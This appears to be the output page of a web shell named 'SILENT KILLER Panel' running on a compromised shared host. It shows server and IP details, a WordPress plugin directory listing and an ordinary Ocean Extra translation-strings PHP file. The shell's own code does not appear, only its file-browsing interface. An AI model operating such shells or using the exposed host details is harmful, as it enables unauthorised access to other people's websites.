SILENT KILLERPanel

Current Path: > home > codekrsu > > ameliagraphics.com > wp-content > plugins > ocean-extra > includes


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//ameliagraphics.com/wp-content/plugins/ocean-extra/includes

NameTypeSizeLast ModifiedActions
admin-bar Directory - -
client-migration Directory - -
compatibility Directory - -
customizer Directory - -
freemius Directory - -
menu-icons Directory - -
metabox Directory - -
onboarding Directory - -
panel Directory - -
post-settings Directory - -
preloader Directory - -
shortcodes Directory - -
themepanel Directory - -
widgets Directory - -
wizard Directory - -
adobe-font.php File 8297 bytes October 16 2024 13:55:14.
custom-code.php File 2245 bytes October 16 2024 13:55:14.
dashboard.php File 7546 bytes February 27 2025 13:36:14.
image-resizer.php File 11613 bytes October 16 2024 13:55:14.
jshrink.php File 21650 bytes May 23 2023 11:24:42.
ocean-extra-strings.php File 2285 bytes November 09 2022 13:00:36.
plugins-tab.php File 5824 bytes November 27 2024 14:36:28.
update-message.php File 6286 bytes January 27 2025 17:10:18.
utils.php File 1534 bytes May 14 2025 14:50:00.
walker.php File 6045 bytes January 27 2022 15:28:52.

Reading File: /home/codekrsu//ameliagraphics.com/wp-content/plugins/ocean-extra/includes/ocean-extra-strings.php

<?php
/**
 * Ocean Extra plugin translation strings
 *
 * @package OceanWP WordPress theme
 */

// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

if ( ! function_exists( 'oe_lang_strings' ) ) {

	/**
	 * Ocean Extra plugin Strings
	 *
	 *  @author OceanWP
	 *  @since 1.7.8
	 *
	 * @param  string  $value  String key.
	 * @param  boolean $echo   Print string.
	 * @return mixed           Return string or nothing.
	 */
	function oe_lang_strings( $value, $echo = true ) {

		$oe_txt_strings = apply_filters(
			'oe_lang_strings',
			array(
				
				// Mailchimp Widget.
				'oe-string-mc-email'                     => apply_filters( 'oe_wai_mc_email', __( 'Enter your email address to subscribe', 'ocean-extra' ) ),
				'oe-string-mc-submit'                    => apply_filters( 'oe_wai_mc_submit', __( 'Submit email address', 'ocean-extra' ) ),
				'oe-string-mc-email-req-alert'           => apply_filters( 'oe_mc_email_req', __( 'Email is required', 'ocean-extra' ) ),
				'oe-string-mc-email-inv-alert'           => apply_filters( 'oe_mc_email_inv', __( 'Email is not valid', 'ocean-extra' ) ),
				'oe-string-mc-gdpr-check'                => apply_filters( 'oe_mc_gdpr_check', __( 'This field is required', 'ocean-extra' ) ),
				'oe-string-mc-msg-succ'                  => apply_filters( 'oe_mc_msg_succ', __( 'Thanks for your subscription.', 'ocean-extra' ) ),
				'oe-string-mc-msg-fail'                  => apply_filters( 'oe_mc_msg_fail', __( 'Failed to subscribe, please contact admin.', 'ocean-extra' ) ),

				// Aria.
				'oe-string-search-form-label'            => apply_filters( 'oe_wai_search_form_label', __( 'Search this website', 'ocean-extra' ) ),
				'oe-string-search-field'                 => apply_filters( 'oe_wai_search_field', __( 'Insert search query', 'ocean-extra' ) ),
				'oe_string_search_submit'                => apply_filters( 'oe_wai_search_submit', __( 'Submit your search', 'ocean-extra' ) ),

			)
		);

		if ( is_rtl() ) {
			// do your stuff.
		}

		$oet_string = isset( $oe_txt_strings[ $value ] ) ? $oe_txt_strings[ $value ] : '';

		/**
		 * Print or return strings
		 */
		if ( $echo ) {
			echo $oet_string; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
		} else {
			return $oet_string;
		}
	}
}

SILENT KILLER Tool